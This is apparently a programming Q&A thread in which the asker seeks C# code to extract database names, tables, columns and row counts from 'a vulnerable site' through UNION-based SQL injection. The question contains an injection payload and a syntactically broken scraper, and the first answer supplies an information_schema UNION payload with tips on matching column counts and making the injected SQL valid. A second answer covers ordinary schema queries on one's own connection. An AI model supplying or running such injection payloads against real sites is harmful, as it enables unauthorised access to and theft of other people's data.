# How to get MYSQL database names, tables, columns and rows in c#

Tags: c#, mysql, union, sql-injection

If I had a vulnerable site how would I go by getting the Database names, table names, column names and amount of rows in the columns using UNION or ERROR queries, in C#?

The code I have right now is:

```
(xNet)
HttpRequest httpRequest = new HttpRequest()

//DB NAMES
string result = httpRequest.Get("https://vulnerable.url/example?id=23" + " UNION ALL SELECT 1, group_concat(.:, database, .:),3,4,5,6 -- ")

//2 is the vulnerable column

if(result.Contains(".:")
{
    string output = Regex.Match(result, ".: (.*?) .:")
}

Console.Writeline(output);
```

That's what I'm trying to use to get the database names, I know that to get the version, i would replace "database()" with "version()" (I think)

but the output is just "database()",

I also want to get the column names and amount of rows in the database.

Thanks

Answer (score 0):

Using the [information_schema SCHEMATA](https://dev.mysql.com/doc/refman/5.7/en/information-schema-schemata-table.html) contains databases but there are other there for [Tables](https://dev.mysql.com/doc/refman/5.7/en/information-schema-tables-table.html) and [COLUMNS](https://dev.mysql.com/doc/refman/5.7/en/information-schema-columns-table.html).

So:

```
UNION SELECT CATALOG_NAME,SCHEMA_NAME FROM information_schema.SCHEMATA
```

The tricky bit is matching the number of columns in this UNION with what the original query is returning. Like your example you can padd fields with dummy values or `CONCAT(f1, ' ', f2)` if you have more fields than the original query.

The other part about SQL is knowing where you are injecting so you can adjust the string to make it valid SQL.

Answer (score 0):

A standard .NET Data way is to retrieve the schema from the open `DbConnection` (`mySqlConnection`). Without any parameter `GetSchema` will retrieve all available `MetaDataCollections`. Those collections might include a "Database" or "Catalogs" collection which contains the database names.

Depending on your used client data implementation (`MySql` or `MySqlConnector`) you will find the names on this way:

MySql:

```cs
mySqlConnection.GetSchema("Databases")
               .Rows
               .Cast<DataRow>()
               .Select(dr => dr["DATABASE_NAME"].ToString())
```

MySqlConnector:

```cs
mySqlConnection.GetSchema("Databases")
               .Rows
               .Cast<DataRow>()
               .Select(dr => dr["SCHEMA_NAME"].ToString())
```

Similar to the database names the schema has per default informations about tables ("`Tables`") and columns ("`Columns`") too. See the content of the `MetaDataCollections` `DataTable` from the schema.